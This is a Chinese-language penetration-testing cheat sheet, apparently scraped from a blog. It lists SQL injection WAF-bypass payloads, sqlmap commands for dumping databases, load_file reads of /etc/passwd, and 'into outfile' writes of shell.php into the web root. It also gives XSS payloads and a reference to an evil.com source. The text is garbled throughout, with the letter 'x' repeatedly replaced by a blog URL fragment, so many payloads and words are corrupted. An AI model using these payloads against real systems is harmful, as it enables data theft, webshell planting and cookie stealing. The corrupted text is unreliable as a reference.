?id=1' or 1 like 1#可以绕过对 = > 等过滤or '1' IN ('1234')#可以替代=

过滤比较符<>

select*fromuserswhereid=1and ascii(substr(database(),0,1))>64select*fromuserswhereid=1and greatest(ascii(substr(database(),0,1)),64)=64

过滤where

逻辑绕过过滤代码 1 && (select user from users where user_id = 1) = 'admin'绕过方式 1 && (select user from users limit 1) = 'admin'

过滤limit

逻辑绕过过滤代码 1 && (select user from users limit 1) = 'admin'绕过方式 1 && (select user from users group by user_id having user_id = 1) = 'admin'#user_id聚合中user_id为1的user为admin

过滤group by

逻辑绕过过滤代码 1 && (select user from users group by user_id having user_id = 1) = 'admin'绕过方式 1 && (select substr(group_concat(user_id),1,1) user from users ) = 1

过滤select

逻辑绕过过滤代码 1 && (select substr(group_concat(user_id),1,1) user from users ) = 1绕过方式 1 && substr(user,1,1) = 'a'

过滤’(单引号)

逻辑绕过waf = 'and|or|union|where|limit|group by|select|\''过滤代码 1 && substr(user,1,1) = 'a'绕过方式 1 && user_id is not null1 && substr(user,1,1) = 0https://blog.csdn.net/yjprolus/article/details/x611 && substr(user,1,1) = unhehttps://blog.csdn.net/yjprolus/article/details/x(61)宽字节绕过%bf%27 %df%27 %aa%27

过滤逗号

在使用盲注的时候，需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决：selectsubstr(database(0from1for1);selectmid(database(0from1for1);对于limit可以使用offset来绕过：select*fromnews limit0,1# 等价于下面这条SQL语句select*fromnews limit1offset0

过滤hehttps://blog.csdn.net/yjprolus/article/details/x

逻辑绕过过滤代码 1 && substr(user,1,1) = unhehttps://blog.csdn.net/yjprolus/article/details/x(61)绕过方式 1 && substr(user,1,1) = lower(conv(11,10,16)) #十进制的11转化为十六进制，并小写。

过滤substr

逻辑绕过过滤代码 1 && substr(user,1,1) = lower(conv(11,10,16))绕过方式 1 && lpad(user(),1,1) in 'r'

编码绕过

利用urlencode，ascii(char)，hehttps://blog.csdn.net/yjprolus/article/details/x，unicode等编码绕过

or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。十六进制编码SELECT(ehttps://blog.csdn.net/yjprolus/article/details/xtractvalue(0https://blog.csdn.net/yjprolus/article/details/x3C613E61646D696E3C2F613E,0https://blog.csdn.net/yjprolus/article/details/x2f61))双重编码绕过?id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

等价函数或变量

hehttps://blog.csdn.net/yjprolus/article/details/x()、bin() ==> ascii()sleep() ==>benchmark()concat_ws()==>group_concat()mid()、substr() ==> substring()@@user ==> user()@@datadir ==> datadir()举例：substring()和substr()无法使用时：?id=1 and ascii(lower(mid((select pwd from users limit 1,1),1,1)))=74　或者：substr((select 'password'),1,1) = 0https://blog.csdn.net/yjprolus/article/details/x70strcmp(left('password',1), 0https://blog.csdn.net/yjprolus/article/details/x69) = 1strcmp(left('password',1), 0https://blog.csdn.net/yjprolus/article/details/x70) = 0strcmp(left('password',1), 0https://blog.csdn.net/yjprolus/article/details/x71) = -1

生僻函数

MySQL/postgresql支持XML函数：Select UpdateXML(‘ ’,’/script/@https://blog.csdn.net/yjprolus/article/details/x/’,’src=//evil.com’);　　　　　　　　　　?id=1 and 1=(updatehttps://blog.csdn.net/yjprolus/article/details/xml(1,concat(0https://blog.csdn.net/yjprolus/article/details/x3a,(select user())),1))SELECT https://blog.csdn.net/yjprolus/article/details/xmlelement(name img,https://blog.csdn.net/yjprolus/article/details/xmlattributes(1as src,'a\l\https://blog.csdn.net/yjprolus/article/details/x65rt(1)'as \117n\https://blog.csdn.net/yjprolus/article/details/x65rror));　//postgresql?id=1 and ehttps://blog.csdn.net/yjprolus/article/details/xtractvalue(1, concat(0https://blog.csdn.net/yjprolus/article/details/x5c, (select table_name from information_schema.tables limit 1)));and 1=(updatehttps://blog.csdn.net/yjprolus/article/details/xml(1,concat(0https://blog.csdn.net/yjprolus/article/details/x5c,(select user()),0https://blog.csdn.net/yjprolus/article/details/x5c),1))and ehttps://blog.csdn.net/yjprolus/article/details/xtractvalue(1, concat(0https://blog.csdn.net/yjprolus/article/details/x5c, (select user()),0https://blog.csdn.net/yjprolus/article/details/x5c))

\N绕过

\N相当于NULL字符

select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0

PCRE绕过

PHP 的 pcre.backtrack_limit 限制利用unionselect

上面的还不行？尝试修改语句逻辑再绕过

sqlmap

基本步骤

检测是否有注入点

• sqlmap -u “http://www.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.com/1.php?id=1”

获取所有数据库名

• sqlmap -u “http://www.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.com/1.php?id=1” --dbs

获取数据表

• sqlmap -u “http://www.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.com/1.php?id=1” -D yj–tables

获取列名

• sqlmap -u “http://www.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.com/1.php?id=1” -D yj -T users --columns

获取数据

• sqlmap -u “http://www.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.com/1.php?id=1” -D yj -T users -C id,username,password --dump

常用参数

-r

• 读取文件，提交数据包
• 用*进行标记

-m

• 批量注入

–cookie

–user-agent

–current-db

–current-user

–users

• 获取当前数据库的登陆用户

–passwords

• 获取当前数据库的用户密码

-v

0：只显示Python错误以及重要信息
1：显示信息以及警告（默认）
2：显示debug消息
3：显示注入payload
4：显示http请求
5：显示http响应头·
6：显示http响应内容

–level

–delay

–time-sec

读写文件

原理

• 读

  • load_file

    • 关键条件

      • 有读权限

        • secure_file_priv
        • SELinuhttps://blog.csdn.net/yjprolus/article/details/x

      • 知道绝对路径

    • 用法

      • id=1’ union select 1,2,load_file(‘/etc/passwd’)
      • id=1’ union select 1,2,load_file(0https://blog.csdn.net/yjprolus/article/details/x0000000)
      • id=1’ union select 1,2,load_file(char(10,20))
      • id=1’ union select 1,2,hehttps://blog.csdn.net/yjprolus/article/details/x(load_file(char(10,20)))

• 写

  • into outfile

    • 关键条件

      • 有写权限

        • secure_file_priv
        • SELinuhttps://blog.csdn.net/yjprolus/article/details/x

      • 知道绝对路径

      • 绕过单引号的过滤

    • 用法

      • id=1’ union select 1,2,‘’ into outfile ‘/var/www/html/shell.php’
      • id=1’ union select 1,2,0https://blog.csdn.net/yjprolus/article/details/x00000000 into outfile ‘/var/www/html/shell.php’

参数

• 读

  • –file-read

• 写

  • –file-write
  • –file-dest

进阶参数

• –os-shell

  • 原理

    • 利用写文件，先写入一个简单的上传页面，再利用上传页面，上传一个webshell执行命令，从webshell页面获取命令回显

• –os-cmd

waf

原理

• 身份认证

  • 白名单
  • 黑名单

• 数据包解析

• 规则匹配

绕waf的方式

• 身份认证层面

  • 伪造白名单

• 数据包解析层面

  • 数据包加密

    • 冰蝎
    • 自加密

• 规则匹配层面

  • 利用数据库、中间件、编程语言的种种特性进行绕过

绕waf基础方式

• 大小写

  • uNioN SeLect

• 替代

  • UNunionION SELselectECT

• 特殊字符

  • 代替空格的特殊字符

    • %0a
    • %0c

  • 括号

  • 花括号

• 编码

  • url编码
  • unicode编码

• 注释符号

  • 普通注释
  • 内联注释

• 综合方式

  • 大小写
  • 特殊字符
  • 编码
  • 注释符号

• 参数污染

• 缓冲区溢出

• 分块传输

• 正则绕过：\bselect\b -> /! 50000select/

• 遗漏的注入点

Tamper

• 常用的tamper脚本

• 用法

  • sqlmap -u “http://www.https://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/xhttps://blog.csdn.net/yjprolus/article/details/x.com/indehttps://blog.csdn.net/yjprolus/article/details/x.php?id=1” --tamper space2comment.py

• 进阶：自己编写tamper脚本

其他

注意站库分离

base64注入

二次解码注入

插入admin’or’1

宽字节注入

OOB

dns外带注入

SQL注入工具：jsql-injection/

总结文章

• sql注入总结 - FreeBuf网络安全行业门户
• sql注入总结复习 - FreeBuf网络安全行业门户

XSS

导图

常用的XSS攻击手段和目的

盗用cookie，获取敏感信息。
2.利用植入Flash，通过crossdomain权限设置进一步获取更高权限；或者利用Java等得到类似的操作。
3.利用iframe、frame、XMLHttpRequest或上述Flash等方式，以（被攻击）用户的身份执行一些管理动作，或执行一些一般的操作如发微博、加好友、发私信等操作。
4.利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动。
5.在访问量极大的一些页面上的XSS可以攻击一些小型网站，实现DDOS攻击的效果。

分类

反射型

反射型跨站脚本（Reflected Cross-Site Scripting）是最常见，也是使用最广的一种，可将恶意脚本附加到 URL 地址的参数中。一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies 或进行钓鱼欺骗。

存储型

持久型跨站脚本（Persistent Cross-Site Scripting）也等同于存储型跨站脚本（Stored Cross-Site Scripting）。此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。

DOM型

传统的 XSS 漏洞一般出现在服务器端代码中，而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞，所以，受客户端浏览器的脚本代码所影响。客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型，因此能够决定用于加载当前页面的 URL。换句话说，客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容，它不依赖于服务器端的数据，而从客户端获得 DOM 中的数据（如从 URL 中提取数据）并在本地执行。另一方面，浏览器用户可以操纵 DOM 中的一些对象，例如 URL、location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到基于 DOM 的 XSS 攻击。

无任何过滤情况下

<scirpt>alert("https://blog.csdn.net/yjprolus/article/details/xss");</script>

<img src=1 onerror=alert("https://blog.csdn.net/yjprolus/article/details/xss");>

<input onfocus="alert('https://blog.csdn.net/yjprolus/article/details/xss');">// 竞争焦点，从而触发onblur事件<input onblur=alert("https://blog.csdn.net/yjprolus/article/details/xss") autofocus><input autofocus>// 通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发<input onfocus="alert('https://blog.csdn.net/yjprolus/article/details/xss');" autofocus>

<details ontoggle="alert('https://blog.csdn.net/yjprolus/article/details/xss');">// 使用open属性触发ontoggle事件，无需用户去触发<details open ontoggle="alert('https://blog.csdn.net/yjprolus/article/details/xss');">

<svg onload=alert("https://blog.csdn.net/yjprolus/article/details/xss");>

<select onfocus=alert(1)></select>// 通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发<select onfocus=alert(1) autofocus>